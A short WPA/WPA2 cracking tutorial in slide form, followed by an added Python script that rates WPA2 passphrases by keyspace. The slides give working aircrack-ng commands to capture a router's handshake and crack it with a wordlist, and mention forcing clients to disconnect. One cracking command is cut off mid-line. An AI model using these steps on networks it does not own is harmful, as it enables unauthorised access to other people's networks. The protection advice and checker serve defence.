Wireless Hacking, Cracking WPA/WPA2
By: Dennis Maldonado
Tools
• BackTrack Linux 5 R2 – Our attacker machine
• Aircrack-ng suite – Suite of tools used to recover wireless encryption keys and carry out all sorts of attacks against wireless networks.
Notes
• AP = Access Point = Wireless Router
• Start the BackTrack GUI with “startx”
• Click the second icon on the bottom left of BackTrack to start a terminal.
How this works
• When clients connect to a WPA/WPA2 encrypted network, they perform a 4-way handshake with the router.
• We need this 4-way handshake to recover the password.
• Once we have the handshake, we can crack the password offline.
• The attack is completely passive from the router’s point of view.
Start wireless card in monitor mode
airmon-ng start wlan0
• Tool used for putting your card into monitor mode
• wlan0 = wireless interface. You can find your wireless interface by typing “iwconfig”.
You should see “monitor mode enabled on mon0” somewhere in the output.
Finding a vulnerable AP
airodump-ng mon0
• Tool used to listen to wireless routers in the area
• Look for any wireless networks that say WPA2
• Remember their BSSID and channel
Capture packets from the victim AP
airodump-ng --bssid 00:13:10:73:FC:C5 -c 6 -w dump mon0
• --bssid is the MAC address of the router
• -c is the channel of the router
• -w is where to save the dump file
• dump is the file name
Keep that running in its own terminal until a client connects.
Capturing the WPA Handshake
• Wait until a client connects
• Alternatively, force a connected client to disconnect, making them reconnect and capturing their handshake.
• Will go into detail on that later…
How to know when you get the handshake
• In airodump-ng, look in the top left.
• You should see “WPA handshake: <bssid>”
• If you do, dance.
• Now you are ready to crack.
• Stop airodump-ng by pressing Control + c
Cracking the captured handshake
• aircrack-ng will crack the password. We specify the BSSID, the dump file, and a wordlist to guess the password with.
• Wordlist = /pentest/database/sqlmap/txt/wordlist.txt
• aircrack-ng -w <list> -b 00:13:10:73:FC:C5 dump*.cap
• aircrack-ng -w /pentest/databas
How to protect yourself
• Choose WPA2
• A WPA2 passphrase can be up to 63 characters. Use them!
• Use numbers, lower- and upper-case letters, and special characters
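The protection slide tells you to use the full 63 characters and several character classes, but not why that defeats the offline cracking step shown on the previous slides. The checker below is an added example, not part of the original slides: it enforces the WPA2 passphrase limits (8 to 63 printable ASCII characters), rejects passphrases found in a small constructed wordlist (standing in for the wordlist the slides use), and turns length and character variety into a keyspace size and a time-to-exhaust estimate. The guess rate and the sample passphrases are constructed assumptions, not measurements.

```python
import math
import string

# WPA2-PSK passphrase limits from the standard: 8 to 63 printable ASCII characters.
MIN_LEN, MAX_LEN = 8, 63

# Assumed offline guess rate used for the estimate (a constructed figure, not a measurement).
ASSUMED_GUESSES_PER_SECOND = 1_000_000

# Tiny constructed wordlist; in practice this would be the attacker's real dictionary.
COMMON_WORDLIST = {"password", "password1", "letmein1", "qwertyuiop", "12345678"}

# Size of each character pool; "special" is the 32 ASCII punctuation marks plus space.
POOL_SIZES = {"lower": 26, "upper": 26, "digit": 10, "special": 33}


def char_classes(passphrase):
    """Return the set of character classes present in the passphrase."""
    classes = set()
    for ch in passphrase:
        if ch in string.ascii_lowercase:
            classes.add("lower")
        elif ch in string.ascii_uppercase:
            classes.add("upper")
        elif ch in string.digits:
            classes.add("digit")
        elif ch in string.punctuation or ch == " ":
            classes.add("special")
    return classes


def keyspace_bits(passphrase):
    """Bits of brute-force keyspace: length * log2(size of the combined pool in use)."""
    pool = sum(POOL_SIZES[c] for c in char_classes(passphrase))
    return len(passphrase) * math.log2(pool) if pool else 0.0


def years_to_exhaust(bits, rate=ASSUMED_GUESSES_PER_SECOND):
    """Years to try every passphrase in a keyspace of the given size at the given rate."""
    return (2 ** bits) / rate / (365 * 24 * 3600)


def check_passphrase(passphrase):
    """Apply the slide's advice as checks and quantify the resulting keyspace."""
    problems = []
    if len(passphrase) < MIN_LEN:
        problems.append("shorter than %d characters" % MIN_LEN)
    if len(passphrase) > MAX_LEN:
        problems.append("longer than %d characters (WPA2 maximum)" % MAX_LEN)
    if not all(32 <= ord(ch) <= 126 for ch in passphrase):
        problems.append("contains non-printable or non-ASCII characters")
    if passphrase.lower() in COMMON_WORDLIST:
        problems.append("appears in a common wordlist (found by dictionary attack)")
    classes = char_classes(passphrase)
    if len(classes) < 3:
        problems.append("uses fewer than 3 character classes")
    bits = keyspace_bits(passphrase)
    return {
        "length": len(passphrase),
        "classes": sorted(classes),
        "bits": round(bits, 1),
        "years_to_exhaust": years_to_exhaust(bits),
        "ok": not problems,
        "problems": problems,
    }


if __name__ == "__main__":
    # Constructed samples: a wordlist entry, a short mixed passphrase, a long mixed passphrase.
    for sample in ("password", "Tr0ub4dor&3", "correct Horse 7 battery Staple! 42 long WPA2 passphrase"):
        report = check_passphrase(sample)
        print("%-58r ok=%-5s bits=%6.1f years=%.3g problems=%s" % (
            sample, report["ok"], report["bits"], report["years_to_exhaust"], report["problems"]))
```

The point the numbers make is that the handshake capture only gives the attacker something to guess against; the cost is entirely in the guessing. A wordlist entry falls immediately regardless of the guess rate, an 11-character mixed passphrase sits around 72 bits, and a long mixed passphrase pushes the keyspace far beyond anything exhaustible offline, which is exactly what the 63-character advice buys you.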